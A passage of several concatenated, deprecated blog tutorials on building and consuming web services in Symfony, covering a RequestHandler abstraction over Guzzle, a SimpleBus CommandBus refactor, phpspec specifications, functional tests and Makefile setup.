imports:
- { resource: services/request_handler.yml }
And finally we'll create the request_handler.yml file:
touch app/config/services/request_handler.yml
The first service we'll define is Guzzle:
#file: app/config/services/request_handler.yml
services:
guzzle.client:
class: GuzzleHttp\Client
This allows us to define the GuzzleRequestHandler:
#file: app/config/services/request_handler.yml
app.guzzle_request_handler:
class: AppBundle\RequestHandler\Middleware\GuzzleRequestHandler
arguments:
- "@guzzle.client"
We want to wrap each of these GuzzleRequestHandler calls with events, so we define EventRequestHandler like this:
#file: app/config/services/request_handler.yml
app.event_request_handler:
class: AppBundle\RequestHandler\Middleware\EventRequestHandler
arguments:
- "@event_dispatcher"
- "@app.guzzle_request_handler"
In the future we might add more middlewares (e.g. RetryRequestHandler, StopwatchRequestHandler, etc), so we want to avoid using a service that points directly to an implementation. We can define an alias:
#file: app/config/services/request_handler.yml
app.request_handler:
alias: app.event_request_handler
Finally, we want to define our listener:
#file: app/config/services/request_handler.yml
app.request_handler.json_response_listener:
class: AppBundle\RequestHandler\Listener\JsonResponseListener
tags:
- { name: kernel.event_listener, event: request_handler.received_response, method: onReceivedResponse }
And that's it!
git add -A
git commit -m 'Defined RequestHandler as a service'
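For readers wondering what the kernel.event_listener tag does under the hood: the container effectively calls addListener on the dispatcher with the configured event name and method. Here's a hedged, self-contained stand-in (TinyDispatcher and Recorder are illustrative classes of mine, not Symfony's):

```php
<?php
// Minimal dispatcher: a map of event name => list of callables.
class TinyDispatcher
{
    private $listeners = array();

    public function addListener($event, $callable)
    {
        $this->listeners[$event][] = $callable;
    }

    public function dispatch($event, $payload)
    {
        if (!isset($this->listeners[$event])) {
            return;
        }
        foreach ($this->listeners[$event] as $callable) {
            call_user_func($callable, $payload);
        }
    }
}

// Stand-in listener, shaped like JsonResponseListener.
class Recorder
{
    public $seen = array();

    public function onReceivedResponse($event)
    {
        $this->seen[] = $event;
    }
}

// The kernel.event_listener tag above roughly amounts to this wiring:
$dispatcher = new TinyDispatcher();
$recorder = new Recorder();
$dispatcher->addListener('request_handler.received_response', array($recorder, 'onReceivedResponse'));

// When EventRequestHandler dispatches, the listener method is invoked.
$dispatcher->dispatch('request_handler.received_response', 'payload');
```

Symfony's real dispatcher adds priorities and event objects, but the tag-to-addListener mapping is the key idea.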
We can now send remote requests using Guzzle without coupling ourselves to the library. We even implemented an EventRequestHandler to provide extension points; it also serves as an example of how to write more RequestHandler middlewares.
In the next article we'll start using RequestHandler in a specific kind of service: Gateways.
You might be interested in Ivory HttpAdapter, a library very similar to our RequestHandler: it sends remote request through a given client (it supports many of them). It also provides events to hook into its workflow!
Personally, I'd rather create my own RequestHandler, as my purpose is to decouple the application from an external library like Guzzle: using a third-party library to do so seems a bit ironic. As you can see, there's little effort involved, and it has the advantage of providing the strict minimum the application needs.
PSR-7 is a standard currently under review: it defines how frameworks should ideally implement the HTTP protocol.
Since it's not yet accepted, it is subject to change, so I wouldn't recommend following it yet. Our RequestHandler loosely models the HTTP protocol, but I'd rather not make it PSR-7 compliant, as that would require implementing many features we don't really need.
To get a balanced opinion on the matter, I'd recommend you to read:
Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fifth article of the series on managing Web Services in a Symfony environment. Have a look at the first four:
Our purpose in this third section is to create an application that consumes the previously created web services.
But for now, we'll just bootstrap it, and start to create a RequestHandler!
We will follow the exact same steps as in the chapter 2.1:
Instead of calling our application ws, we'll call it cs (like Consuming Service).
Is the application bootstrapped yet? If it is, then we can continue.
In order to consume web services, we need to be able to make remote requests. PHP
provides some native functions for this (file_get_contents, stream_socket_client,
fopen, etc) and we can find many libraries as well (Buzz,
HTTP Full, React, etc).
For this series, we'll use Guzzle:
composer require guzzlehttp/guzzle:~5.0
Let's commit it for now:
git add -A
git commit -m 'Installed Guzzle'
Sometimes we need to decouple our application from the third party libraries it depends on.
For example, let's say we were using Guzzle 4, but we'd like to use Amazon Web Services (AWS) S3 in our project. The issue? Its version 2 depends on Guzzle 3, and its version 3 depends on Guzzle 5. We'd now need to upgrade our usage of Guzzle everywhere in our application.
To minimize this, we can centralize the usage of Guzzle in one single file. In order to be able to do so, we'll create a RequestHandler:
<?php
// File: src/AppBundle/RequestHandler/RequestHandler.php
namespace AppBundle\RequestHandler;
interface RequestHandler
{
// @return Response
public function handle(Request $request);
}
In our application we can rely on this interface: we own it and it is unlikely to change. We'll now create an object that describes the request to send:
./bin/phpspec describe 'AppBundle\RequestHandler\Request'
A minimalistic raw HTTP request looks like the following:
GET /api/v1/profiles HTTP/1.1
Since we don't really care about the protocol's version we can define the constructor with two arguments:
// File: spec/AppBundle/RequestHandler/RequestSpec.php
function it_has_a_verb_and_an_uri()
{
$this->beConstructedWith('GET', '/api/v1/profiles');
$this->getVerb()->shouldBe('GET');
$this->getUri()->shouldBe('/api/v1/profiles');
}
Running the specifications will bootstrap the class for us:
./bin/phpspec run
We can now make the test pass by writing the code:
<?php
// File: src/AppBundle/RequestHandler/Request.php
namespace AppBundle\RequestHandler;
class Request
{
private $verb;
private $uri;
public function __construct($verb, $uri)
{
$this->verb = $verb;
$this->uri = $uri;
}
public function getVerb()
{
return $this->verb;
}
public function getUri()
{
return $this->uri;
}
}
Let's check if it's enough for now:
./bin/phpspec run
All green, we can commit:
git add -A
git commit -m 'Created Request'
A request usually has headers:
// File: spec/AppBundle/RequestHandler/RequestSpec.php
function it_can_have_headers()
{
$this->beConstructedWith('GET', '/api/v1/profiles');
$this->setHeader('Content-Type', 'application/json');
$this->getHeaders()->shouldBe(array('Content-Type' => 'application/json'));
}
Let's bootstrap them:
./bin/phpspec run
And complete the code:
// File: src/AppBundle/RequestHandler/Request.php
private $headers = array();
public function setHeader($name, $value)
{
$this->headers[$name] = $value;
}
public function getHeaders()
{
return $this->headers;
}
This makes the test pass:
./bin/phpspec run
That's worth a commit:
git add -A
git commit -m 'Added headers to Request'
The last addition to our request will be the possibility to add a body:
// File: spec/AppBundle/RequestHandler/RequestSpec.php
function it_can_have_a_body()
{
$this->beConstructedWith('GET', '/api/v1/profiles');
$this->setBody('{"wound":"just a flesh one"}');
$this->getBody()->shouldBe('{"wound":"just a flesh one"}');
}
As usual we bootstrap it:
./bin/phpspec run
And then we complete it:
// File: src/AppBundle/RequestHandler/Request.php
private $body;
public function setBody($body)
{
$this->body = $body;
}
public function getBody()
{
return $this->body;
}
Let's make our console green:
./bin/phpspec run
Let's make our console grin:
git add -A
git commit -m 'Added body to Request'
RequestHandler should return a Response object:
./bin/phpspec describe 'AppBundle\RequestHandler\Response'
A minimalistic raw HTTP response looks like the following:
HTTP/1.1 204 NO CONTENT
Since we care about neither the protocol's version nor the reason phrase, we can define the constructor with a single argument:
// File: spec/AppBundle/RequestHandler/ResponseSpec.php
function it_has_a_status_code()
{
$this->beConstructedWith(204);
$this->getStatusCode()->shouldBe(204);
}
Running the specifications will bootstrap the class for us:
./bin/phpspec run
We can now make the test pass by writing the code:
<?php
// File: src/AppBundle/RequestHandler/Response.php
namespace AppBundle\RequestHandler;
class Response
{
private $statusCode;
public function __construct($statusCode)
{
$this->statusCode = $statusCode;
}
public function getStatusCode()
{
return $this->statusCode;
}
}
Let's check if it's enough for now:
./bin/phpspec run
All green, we can commit:
git add -A
git commit -m 'Created Response'
A response can also have headers:
// File: spec/AppBundle/RequestHandler/ResponseSpec.php
function it_can_have_headers()
{
$this->beConstructedWith(204);
$this->setHeaders(array('Content-Type' => 'application/json'));
$this->getHeader('Content-Type')->shouldBe('application/json');
}
Let's bootstrap them:
./bin/phpspec run
And complete the code:
// File: src/AppBundle/RequestHandler/Response.php
private $headers = array();
public function setHeaders(array $headers)
{
$this->headers = $headers;
}
public function getHeader($name)
{
return (isset($this->headers[$name]) ? $this->headers[$name] : null);
}
This makes the test pass:
./bin/phpspec run
That's worth a commit:
git add -A
git commit -m 'Added headers to Response'
Last but not least, the response's body:
// File: spec/AppBundle/RequestHandler/ResponseSpec.php
function it_can_have_a_body()
{
$this->beConstructedWith(200);
$this->setBody('{"wound":"just a flesh one"}');
$this->getBody()->shouldBe('{"wound":"just a flesh one"}');
}
As usual we bootstrap it:
./bin/phpspec run
And then we complete it:
// File: src/AppBundle/RequestHandler/Response.php
private $body;
public function setBody($body)
{
$this->body = $body;
}
public function getBody()
{
return $this->body;
}
Let's make our console green:
./bin/phpspec run
Let's make our console grin:
git add -A
git commit -m 'Added body to Response'
We've bootstrapped an application, and created a RequestHandler which will help us to avoid coupling with Guzzle. In the next article, we'll talk about middleware and start to create some RequestHandler implementations (yes, more than one!).
Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fourth article of the series on managing Web Services in a Symfony environment. Have a look at the first three:
You can check the code in the following repository.
In the previous post we've created a first endpoint by taking a few shortcuts. As we wouldn't want to get technical debt, we're going to refactor it.
In order to avoid the mud, we need to remove the logic from the controller. But which logic?
In Symfony, controllers receive a Request and return a Response (this follows the HTTP protocol). It is also the glue between the framework and our application.
From this we can assume that its responsibility is to:
The request's parameters could be legion; we wouldn't want a method with too many arguments. A way to solve this is to create a Data Transfer Object (DTO): we put all those parameters in it and give it to the appropriate service.
The Command Bus pattern is very fitting for this purpose: the DTO is called a Command, and its name should
communicate our intention (in our example, CreateProfile). It also has the responsibility of
validating the user's input (for example, converting IDs into integers).
Each Command is associated with exactly one CommandHandler service, which does the actual logic.
Finally, there's the CommandBus: it finds the appropriate CommandHandler for the given Command and executes it. It also executes some routines before and after the call (for example, we can flush Doctrine after each command).
Note: CommandHandlers don't return anything.
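The pattern described above can be sketched in a few lines. This is an illustrative toy, not SimpleBus's actual API; the in-memory `$created` array stands in for real persistence:

```php
<?php
// Toy CommandBus: routes each Command to its single registered Handler.
class CommandBus
{
    private $handlers = array();

    // Map a Command class name to its Handler.
    public function register($commandClass, $handler)
    {
        $this->handlers[$commandClass] = $handler;
    }

    public function handle($command)
    {
        // Pre/post routines (e.g. flushing Doctrine) would wrap this call.
        $this->handlers[get_class($command)]->handle($command);
    }
}

// A Command is a DTO whose name states the intention; it validates input.
class CreateProfile
{
    public $name;

    public function __construct($name)
    {
        if (null === $name) {
            throw new \DomainException('The "name" parameter is missing');
        }
        $this->name = $name;
    }
}

// The Handler does the actual logic and returns nothing.
class CreateProfileHandler
{
    public $created = array();

    public function handle($command)
    {
        $this->created[] = $command->name;
    }
}
```

Usage: register the handler once, then `$bus->handle(new CreateProfile('Arthur'))` from any controller or console command, keeping the imperative logic out of both.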
If you want to find out more about the Command Bus pattern, I'd recommend having a look at this series by Matthias Noback:
Since commands are all about sending a message, you can also read Mathias Verraes' article on Messaging flavours. He also wrote a nice article on Form, Command and Model validation.
SimpleBus is a small library that fits our purpose:
composer require simple-bus/doctrine-orm-bridge
composer require simple-bus/symfony-bridge
Note: It requires at least PHP 5.4.
You need to register the bundle in our application's kernel:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Symfony\Bundle\SecurityBundle\SecurityBundle(),
new Symfony\Bundle\TwigBundle\TwigBundle(),
new Symfony\Bundle\MonologBundle\MonologBundle(),
new Symfony\Bundle\SwiftmailerBundle\SwiftmailerBundle(),
new Symfony\Bundle\AsseticBundle\AsseticBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
new SimpleBus\SymfonyBridge\SimpleBusCommandBusBundle(),
new SimpleBus\SymfonyBridge\SimpleBusEventBusBundle(),
new SimpleBus\SymfonyBridge\DoctrineOrmBridgeBundle(),
new AppBundle\AppBundle(),
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
$bundles[] = new Symfony\Bundle\DebugBundle\DebugBundle();
$bundles[] = new Symfony\Bundle\WebProfilerBundle\WebProfilerBundle();
$bundles[] = new Sensio\Bundle\DistributionBundle\SensioDistributionBundle();
$bundles[] = new Sensio\Bundle\GeneratorBundle\SensioGeneratorBundle();
}
return $bundles;
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
Let's commit this installation:
git add -A
git commit -m 'Installed SimpleBus'
We didn't create a ProfileRepository earlier, but we're going to need it now:
<?php
// File: src/AppBundle/Entity/ProfileRepository.php
namespace AppBundle\Entity;
use Doctrine\ORM\EntityRepository;
class ProfileRepository extends EntityRepository
{
}
We should name the Command after the action we want to do. In our case we want to create a profile:
<?php
// File: src/AppBundle/CommandBus/CreateProfile.php
namespace AppBundle\CommandBus;
use SimpleBus\Message\Message;
class CreateProfile implements Message
{
public $name;
public function __construct($name)
{
$this->name = $name;
}
}
We then need a CommandHandler to do the actual creation. Since there will be some logic, let's create a specification:
./bin/phpspec describe 'AppBundle\CommandBus\CreateProfileHandler'
And now we can describe it:
<?php
// File: spec/AppBundle/CommandBus/CreateProfileHandlerSpec.php
namespace spec\AppBundle\CommandBus;
use AppBundle\CommandBus\CreateProfile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class CreateProfileHandlerSpec extends ObjectBehavior
{
const NAME = 'John Cleese';
function let(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->beConstructedWith($objectManager, $profileRepository);
}
function it_creates_a_profile(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$profileRepository->findOneBy(array('name' => self::NAME))->willReturn(null);
$createdProfile = Argument::type('AppBundle\Entity\Profile');
$objectManager->persist($createdProfile)->shouldBeCalled();
$this->handle(new CreateProfile(self::NAME));
}
}
This allows us to generate the code's skeleton:
./bin/phpspec run
And to finally write the code to make the test pass:
<?php
// File: src/AppBundle/CommandBus/CreateProfileHandler.php
namespace AppBundle\CommandBus;
use AppBundle\Entity\Profile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use SimpleBus\Message\Handler\MessageHandler;
use SimpleBus\Message\Message;
class CreateProfileHandler implements MessageHandler
{
private $objectManager;
private $profileRepository;
public function __construct(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->objectManager = $objectManager;
$this->profileRepository = $profileRepository;
}
public function handle(Message $message)
{
$profile = $this->profileRepository->findOneBy(array('name' => $message->name));
$newProfile = new Profile($message->name);
$this->objectManager->persist($newProfile);
}
}
Let's check the tests:
./bin/phpspec run
All green, we can commit:
git add -A
git commit -m 'Created CreateProfileHandler'
Domain validation (e.g. name duplication check) should be handled by the CommandHandler (previously it was done in the controller):
<?php
// File: spec/AppBundle/CommandBus/CreateProfileHandlerSpec.php
namespace spec\AppBundle\CommandBus;
use AppBundle\CommandBus\CreateProfile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class CreateProfileHandlerSpec extends ObjectBehavior
{
const NAME = 'John Cleese';
function let(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->beConstructedWith($objectManager, $profileRepository);
}
function it_creates_a_profile(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$profileRepository->findOneBy(array('name' => self::NAME))->willReturn(null);
$createdProfile = Argument::type('AppBundle\Entity\Profile');
$objectManager->persist($createdProfile)->shouldBeCalled();
$this->handle(new CreateProfile(self::NAME));
}
function it_cannot_create_the_profile_if_the_name_has_already_been_registered(ProfileRepository $profileRepository)
{
$profile = Argument::type('AppBundle\Entity\Profile');
$profileRepository->findOneBy(array('name' => self::NAME))->willReturn($profile);
$domainException = '\DomainException';
$this->shouldThrow($domainException)->duringHandle(new CreateProfile(self::NAME));
}
}
Note: We try to be as descriptive as necessary in the test methods (a bad example would have been
testThrowsDomainException).
Here's the code to make the test pass:
<?php
// File: src/AppBundle/CommandBus/CreateProfileHandler.php
namespace AppBundle\CommandBus;
use AppBundle\Entity\Profile;
use AppBundle\Entity\ProfileRepository;
use Doctrine\Common\Persistence\ObjectManager;
use SimpleBus\Message\Handler\MessageHandler;
use SimpleBus\Message\Message;
class CreateProfileHandler implements MessageHandler
{
private $objectManager;
private $profileRepository;
public function __construct(ObjectManager $objectManager, ProfileRepository $profileRepository)
{
$this->objectManager = $objectManager;
$this->profileRepository = $profileRepository;
}
public function handle(Message $message)
{
$profile = $this->profileRepository->findOneBy(array('name' => $message->name));
if (null !== $profile) {
throw new \DomainException(sprintf('The name "%s" is already taken', $message->name));
}
$newProfile = new Profile($message->name);
$this->objectManager->persist($newProfile);
}
}
Let's check the tests:
./bin/phpspec run
They pass!
git add -A
git commit -m 'Added check on name duplication'
Input validation (e.g. presence of name parameter) should be done in the Command (previously it was done in the controller):
<?php
// File: src/AppBundle/CommandBus/CreateProfile.php
namespace AppBundle\CommandBus;
use SimpleBus\Message\Message;
class CreateProfile implements Message
{
public $name;
public function __construct($name)
{
if (null === $name) {
throw new \DomainException('The "name" parameter is missing from the request\'s body');
}
$this->name = $name;
}
}
Let's commit it:
git add -A
git commit -m 'Added check on name presence in the request'
Our Command and CommandHandler both throw a DomainException; we can catch it in an exception listener and create a nice response:
<?php
// File: src/AppBundle/EventListener/DomainExceptionListener.php
namespace AppBundle\EventListener;
use DomainException;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
class DomainExceptionListener
{
/**
* @param GetResponseForExceptionEvent $event
*/
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof DomainException) {
return;
}
$error = $exception->getMessage();
$event->setResponse(new JsonResponse(array('error' => $error), 422));
}
}
It needs to be registered in the Dependency Injection Container:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.forbidden_exception_listener:
class: AppBundle\EventListener\ForbiddenExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
app.domain_exception_listener:
class: AppBundle\EventListener\DomainExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
We can save it:
git add -A
git commit -m 'Created DomainExceptionListener'
Now that our CommandHandler is ready, we'll define it as a service with its repository:
# File: app/config/services.yml
services:
app.submit_json_listener:
class: AppBundle\EventListener\SubmitJsonListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.forbidden_exception_listener:
class: AppBundle\EventListener\ForbiddenExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
app.domain_exception_listener:
class: AppBundle\EventListener\DomainExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException, priority: 10 }
app.profile_repository:
class: AppBundle\Entity\ProfileRepository
factory_service: doctrine.orm.default_entity_manager
factory_method: getRepository
arguments: ['AppBundle:Profile']
app.create_profile_handler:
class: AppBundle\CommandBus\CreateProfileHandler
arguments:
- "@doctrine.orm.entity_manager"
- "@app.profile_repository"
tags:
- { name: command_handler, handles: AppBundle\CommandBus\CreateProfile }
And call it in the controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php
namespace AppBundle\Controller;
use AppBundle\CommandBus\CreateProfile;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$name = $request->request->get('name');
$this->get('command_bus')->handle(new CreateProfile($name));
$createdProfile = $this->get('app.profile_repository')->findOneBy(array('name' => $name));
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Note: Since the CommandHandler doesn't return anything, we need to call the repository to get the created profile.
As it happens, we forgot to set ProfileRepository in Profile's Entity annotation.
Let's fix it now:
<?php
// File: src/AppBundle/Entity/Profile.php
namespace AppBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* @ORM\Table(name="profile")
* @ORM\Entity(repositoryClass="AppBundle\Entity\ProfileRepository")
*/
class Profile
{
/**
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="AUTO")
*/
private $id;
/**
* @ORM\Column(name="name", type="string", unique=true)
*/
private $name;
public function __construct($name)
{
$this->name = $name;
}
public function toArray()
{
return array(
'id' => $this->id,
'name' => $this->name,
);
}
}
Did we break anything?
make test
No, all tests are super green!
git add -A
git commit -m 'Used CreateProfileHandler in controller'
Technical debt is something we should be able to manage. When the time comes to refactor, design patterns can be a helpful tool.
CommandBus is a nice pattern that allows us to remove imperative logic from the controllers. It's easy to write unit tests for CommandHandlers, and they can be reused (creating a profile is surely something we'll need elsewhere in our application).
This article concludes the second part of this series on web services in a Symfony environment. In the next one, we'll start a new application which consumes the one we just created.
Note: The web service we described also had a removal endpoint. Since there's not much else to learn, it won't be created in this series.
A lot of things can be improved in the current application; here are some tips for those who'd like to practice:
validator in the CommandHandler and set annotations in the Command)
Reference: see the phpspec reference article
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the third article of the series on managing Web Services in a Symfony environment. Have a look at the first two:
You can check the code in the following repository.
In this post we'll see how to create profiles:
First things first, we'll write a functional test:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
$this->app->boot();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
}
The test should fail, because the route hasn't been found (404 NOT FOUND):
phpunit -c app
Flabbergasted! The test fails with a PHP Fatal error: Class 'AppKernel' not found!
Let's fix this by adding the forgotten opening PHP tag to the bootstrap file:
<?php
// File: app/bootstrap.php
require __DIR__.'/bootstrap.php.cache';
require __DIR__.'/AppKernel.php';
Let's check how the tests react:
phpunit -c app
Another failure: the database doesn't exist. We need to create it for the test environment:
php app/console doctrine:database:create --env=test
Let's run the tests once again:
phpunit -c app
This time the test fails for the right reason: the page doesn't exist. To fix this, we'll create an empty controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$name = $request->request->get('name');
$createdProfile = array();
return new JsonResponse($createdProfile, 201);
}
}
This should make the test pass:
phpunit -c app
If an error occurs (404 not found), then it might be because of the cache:
php app/console cache:clear --env=test
phpunit -c app
Running tests is becoming cumbersome, let's make it easy using a Makefile:
# Makefile
test:
php app/console cache:clear --env=test
php app/console doctrine:database:create --env=test
phpunit -c app
php app/console doctrine:database:drop --force --env=test
Note: mind the tabs, make doesn't support space indentation.
In order for this to work we'll need to drop the database (because it already exists):
php app/console doctrine:database:drop --force --env=test
Tests can now be run using:
make test
Everything's fine, we can commit our work:
git add -A
git commit -m 'Created profile creation endpoint'
At this point, we'll need to store the profile in a database. For this purpose, we'll use MySQL and Doctrine, so we'll need to create a profile entity.
We'll first generate a skeleton of its specification using phpspec:
./bin/phpspec describe 'AppBundle\Entity\Profile'
Then we'll edit the specification:
<?php
// File: spec/AppBundle/Entity/ProfileSpec.php
namespace spec\AppBundle\Entity;
use PhpSpec\ObjectBehavior;
class ProfileSpec extends ObjectBehavior
{
const NAME = 'Arthur Dent';
function let()
{
$this->beConstructedWith(self::NAME);
}
function it_can_be_converted_to_array()
{
$this->toArray()->shouldBe(array(
'id' => null,
'name' => self::NAME,
));
}
}
Since we're happy with this step, we'll generate a skeleton of the code:
./bin/phpspec run
Of course we need to edit it:
<?php
// File: src/AppBundle/Entity/Profile.php
namespace AppBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* @ORM\Table(name="profile")
* @ORM\Entity
*/
class Profile
{
/**
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="AUTO")
*/
private $id;
/**
* @ORM\Column(name="name", type="string", unique=true)
*/
private $name;
public function __construct($name)
{
$this->name = $name;
}
public function toArray()
{
return array(
'id' => $this->id,
'name' => $this->name,
);
}
}
Let's check if it satisfies our specification:
./bin/phpspec run
It does! With this we can generate our database:
php app/console doctrine:database:create
php app/console doctrine:schema:create
Let's update our Makefile:
# Makefile
prod:
php app/console cache:clear --env=prod
php app/console doctrine:database:create --env=prod
php app/console doctrine:schema:create --env=prod
dev:
php app/console cache:clear --env=dev
php app/console doctrine:database:create --env=dev
php app/console doctrine:schema:create --env=dev
test:
php app/console cache:clear --env=test
php app/console doctrine:database:create --env=test
php app/console doctrine:schema:create --env=test
phpunit -c app
bin/phpspec run
php app/console doctrine:database:drop --force --env=test
This allows us to also run phpspec for tests. Installing a project should be as simple as:
make
And for development we can use:
make dev
Note: trying to run `make` or `make dev` a second time will fail, as the database already exists. We'd then need to run `php app/console doctrine:database:drop --force --env=prod` or `php app/console doctrine:database:drop --force --env=dev` respectively, but we should really run those commands only once.
It is time to commit our progress:
git add -A
git commit -m 'Created Profile entity'
The only thing missing in our application is the actual creation of the profile. Before doing anything with the code, we'll need to update our functional test: we don't want the data to be actually persisted, as it would make the test fail on a second run:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
private $em;
protected function setUp()
{
$this->app = new \AppKernel('test', true);
$this->app->boot();
$this->em = $this->app->getContainer()->get('doctrine.orm.entity_manager');
$this->em->beginTransaction();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
protected function tearDown()
{
$this->em->rollback();
$this->em->close();
}
}
Let's update the controller:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Entity\Profile;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
* @Method({"POST"})
*/
public function createProfileAction(Request $request)
{
$em = $this->get('doctrine.orm.entity_manager');
$createdProfile = new Profile($request->request->get('name'));
$em->persist($createdProfile);
$em->flush();
return new JsonResponse($createdProfile->toArray(), 201);
}
}
Time to run the tests:
make test
All green! We can commit:
git add -A
git commit -m 'Saved created profile in database'
Our endpoint should return an error if the "name" parameter is missing. Let's add a functional test for this:
<?php
// File: tests/Controller/ProfileCreationControllerTest.php
namespace AppBundle\Tests\Controller;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
private $em;
protected function setUp()
{
$this->app = new \AppKernel('test', true);
$this->app->boot();
$this->em = $this->app->getContainer()->get('doctrine.orm.entity_manager');
$this->em->beginTransaction();
}
public function testItCreatesProfiles()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('name' => 'Fawlty Towers'));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(201, $response->getStatusCode(), $response->getContent());
}
public function testItFailsIfNameIsMissing()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
'PHP_AUTH_USER' => 'spanish_inquisition',
'PHP_AUTH_PW' => 'NobodyExpectsIt!',
);
$body = json_encode(array('no-name' => ''));
$request = Request::create('/api/v1/profiles', 'POST', array(), array(), array(), $headers, $body);
$response = $this->app->handle($request);
$this->assertSame(422, $response->getStatusCode(), $response->getContent());
}
protected function tearDown()
{
$this->em->rollback();
$this->em->close();
}
}
It should make our tests fail:
make test
We can make this test pass by adding a simple check:
<?php
// File: src/AppBundle/Controller/ProfileCreationController.php;
namespace AppBundle\Controller;
use AppBundle\Entity\Profile;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Method;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
class ProfileCreationController extends Controller
{
/**
* @Route("/api/v1/profiles")
